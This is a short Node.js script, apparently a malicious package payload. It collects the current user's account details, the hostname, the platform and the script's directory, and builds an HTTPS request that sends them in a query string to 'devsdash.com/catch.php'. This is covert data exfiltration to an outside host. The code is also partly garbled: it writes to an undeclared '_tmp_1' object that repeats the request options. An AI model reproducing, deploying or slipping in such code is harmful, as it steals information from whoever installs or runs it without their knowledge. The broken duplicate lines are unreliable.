var os = require("os")
var path = require("path")
var user = os.userInfo()
var host = os.hostname()
var platform = os.platform()
var dirpath = path.dirname(__filename)
var data = JSON.stringify({ user, host, platform, dirpath })
const https = require("https")
const options = {
  hostname: "devsdash.com",
  port: 443,
  path: "/catch.php?new_data123=" + data,
  method: "GET",
}
_tmp_1.hostname = "devsdash.com"
_tmp_1.port = 443
_tmp_1.path = "/catch.php?new_data123=" + data
_tmp_1.method = "GET"
const req = https.request(options)
